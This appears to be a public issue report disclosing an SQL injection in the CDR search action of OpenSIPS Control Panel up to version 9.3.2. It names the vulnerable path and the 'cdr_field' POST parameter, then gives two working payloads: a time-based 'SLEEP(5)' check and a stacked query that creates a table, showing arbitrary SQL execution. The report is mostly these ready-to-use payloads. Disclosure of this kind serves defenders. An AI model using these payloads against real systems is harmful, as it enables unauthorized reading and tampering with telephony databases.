Opensips CP <=9.3.2 : CDR Search Action SQL Injection

Question

Opensips CP <=9.3.2 : CDR Search Action SQL Injection

Integration-IT opened this issue 3 years ago · 0 comments

Hello,

PATH:

/cp/tools/system/cdrviewer/cdrviewer.php

PARAM:

cdr_field (duration)

METHOD:

POST

INJECTION CHECK:

Payload: cdr_field=duration;SELECT SLEEP(5)#&search_regexp=0&start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07&export=Export

ARBITRARY COMMAND:

cdr_field=duration;CREATE TABLE Injection (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,firstname VARCHAR(30) NOT NULL,lastname VARCHAR(30) NOT NULL,email VARCHAR(50),reg_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP)#&search_regexp=0&start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07&export=Export